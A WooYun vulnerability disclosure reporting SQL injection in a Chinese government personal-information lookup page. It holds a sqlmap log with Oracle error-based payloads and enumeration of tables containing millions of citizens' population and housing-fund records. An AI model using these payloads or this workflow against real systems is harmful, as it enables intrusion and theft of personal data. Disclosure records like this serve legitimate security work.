乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-17: 细节已通知厂商并且等待厂商处理中 2015-09-19: 厂商已经确认,细节仅向厂商公开 2015-09-29: 细节向核心白帽子及相关领域专家公开 2015-10-09: 细节向普通白帽子公开 2015-10-19: 细节向实习白帽子公开 2015-11-03: 细节向公众公开
存在SQL注入
http://**.**.**.**/chaxun_geren.asp
查找个人的,这里有注入
[01:06:47] [INFO] testing connection to the target URL[01:06:48] [INFO] testing if the target URL is stable. This can take a couple of seconds[01:06:50] [INFO] target URL is stable[01:06:50] [INFO] testing if POST parameter 'RealName' is dynamic[01:06:50] [WARNING] POST parameter 'RealName' does not appear dynamic[01:06:50] [INFO] heuristic (basic) test shows that POST parameter 'RealName' might be injectable (possible DBMS: 'Oracle')[01:06:50] [INFO] testing for SQL injection on POST parameter 'RealName'[01:06:51] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[01:06:55] [WARNING] reflective value(s) found and filtering out[01:06:58] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[01:07:00] [INFO] POST parameter 'RealName' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable[01:07:07] [INFO] testing 'Oracle inline queries'[01:07:07] [INFO] testing 'Oracle AND time-based blind'[01:07:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'[01:07:07] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found[01:07:08] [INFO] ORDER BY technique seems to be usable. This should reduce thetime needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test[01:07:10] [INFO] target URL appears to have 1 column in queryPOST parameter 'RealName' is vulnerable. Do you want to keep testing the others(if any)? [y/N] y[01:07:14] [INFO] testing if POST parameter 'UserIDCard' is dynamic[01:07:14] [WARNING] POST parameter 'UserIDCard' does not appear dynamic[01:07:15] [INFO] heuristic (basic) test shows that POST parameter 'UserIDCard'might be injectable (possible DBMS: 'Oracle')[01:07:15] [INFO] testing for SQL injection on POST parameter 'UserIDCard'[01:07:15] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'[01:07:22] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'[01:07:25] [INFO] POST parameter 'UserIDCard' is 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' injectable[01:07:25] [INFO] testing 'Oracle inline queries'[01:07:25] [INFO] testing 'Oracle AND time-based blind'[01:07:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'POST parameter 'UserIDCard' is vulnerable. Do you want to keep testing the others (if any)? [y/N] nsqlmap identified the following injection points with a total of 59 HTTP(s) requests:---Place: POSTParameter: RealName Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: RealName=111' AND 7087=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(114)||CHR(115)||CHR(114)||CHR(113)||(SELECT (CASE WHEN (7087=7087) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'AcMJ'='AcMJ&UserIDCard=222&GetType=0&button= %B2%E9%D1%AFPlace: POSTParameter: UserIDCard Type: error-based Title: Oracle AND error-based - WHERE or HAVING clause (XMLType) Payload: RealName=111&UserIDCard=222' AND 2427=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(114)||CHR(115)||CHR(114)||CHR(113)||(SELECT (CASE WHEN(2427=2427) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(101)||CHR(114)||CHR(113)||CHR(62))) FROM DUAL) AND 'RJbB'='RJbB&GetType=0&button= %B2%E9%D1%AF---there were multiple injection points, please select the one to use for following injections:[0] place: POST, parameter: RealName, type: Single quoted string (default)[1] place: POST, parameter: UserIDCard, type: Single quoted string[q] Quit> 0[01:07:46] [INFO] the back-end DBMS is Oracleweb server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5back-end DBMS: Oracle[01:07:46] [INFO] fetching current user[01:07:46] [INFO] retrieved: XYS_DATAcurrent user: 'XYS_DATA'[01:07:46] [INFO] fetching current database[01:07:46] [INFO] resumed: XYS_DATA[01:07:46] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSescurrent schema (equivalent to database on Oracle): 'XYS_DATA'[01:07:46] [INFO] testing if current user is DBAcurrent user is DBA: Falsedatabase management system users [42]:[*] AMBULANCE[*] ANONYMOUS[*] APEX_030200[*] APEX_PUBLIC_USER[*] APPQOSSYS[*] BI[*] CTXSYS[*] DBSNMP[*] DIP[*] EXFSYS[*] FAREN[*] FLOWS_FILES[*] HR[*] IX[*] MDDATA[*] MDSYS[*] MGMT_VIEW[*] OCCIWRAPPER[*] OE[*] OLAPSYS[*] ORACLE_OCM[*] ORDDATA[*] ORDPLUGINS[*] ORDSYS[*] OUTLN[*] OWBSYS[*] OWBSYS_AUDIT[*] PM[*] SCOTT[*] SH[*] SI_INFORMTN_SCHEMA[*] SPATIAL_CSW_ADMIN_USR[*] SPATIAL_WFS_ADMIN_USR[*] SYS[*] SYSMAN[*] SYSTEM[*] TAIJI[*] WMSYS[*] XDB[*] XS$NULL[*] XYS_DATA[*] XYS_DATA_IMPORTavailable databases [9]:[*] APEX_030200[*] CTXSYS[*] EXFSYS[*] MDSYS[*] OLAPSYS[*] SYS[*] SYSTEM[*] XDB[*] XYS_DATADatabase: XYS_DATA+-----------------------+---------+| Table | Entries |+-----------------------+---------+| TBL_BASE_POPULATION | 7505097 || TBL_SHEET_INFO_14 | 5186324 || BAK_SHEET_INFO_13 | 5178531 || WJW_EXTEND_CZRKPERSON | 4946198 || BAK_BASE_POPULATION | 3770536 || TBL_SHEET_INFO_4 | 3710291 || WJW_EXTEND_LDRKPERSON | 398605 || TBL_SHEET_INFO_3 | 380000 || TBL_SHEET_INFO_8 | 376036 || TBL_SHEET_INFO_11 | 371212 || GJJ_EXTENDS_PERSON | 357117 || TBL_SHEET_INFO_9 | 312138 || YGT_EXTEND_POPULATION | 200185 || TBL_BASE_ENTERPRISE | 73195 || TBL_SHEET_INFO_22 | 45827 || TBL_SHEET_INFO_6 | 13468 || YGT_EXTEND_ENTERPRISE | 5680 || TBL_SHEET_INFO_26 | 1015 || TBL_SHEET_INFO_25 | 164 || TBL_SHEET_INFO_16 | 107 || TBL_SHEET_INFO_30 | 61 || TBL_SHEET_INFO_15 | 40 || TBL_SHEET_INFO_17 | 34 || TBL_SHEET_INFO_29 | 4 || TBL_SHEET_INFO_18 | 1 |+-----------------------+---------+
| GJJ_EXTENDS_PERSON | 357117 || WJW_EXTEND_CZRKPERSON | 4946198 || WJW_EXTEND_LDRKPERSON | 398605 |
测试GJJ_EXTENDS_PERSON中的10个看看,可以看到每个月缴纳的公积金以及公积金综合,还有一些相关信息,不知道算不算敏感?
http://**.**.**.**/bugs/wooyun-2015-0129844这里面提到的DepartmentName和DepartmentNum还没有修复!~~~
如上
过滤修复
危害等级:高
漏洞Rank:10
确认时间:2015-09-19 18:34
CNVD确认并复现所述漏洞情况,已经转由CNCERT下发给陕西分中心,由陕西分中心后续协调网站管理单位处置。
暂无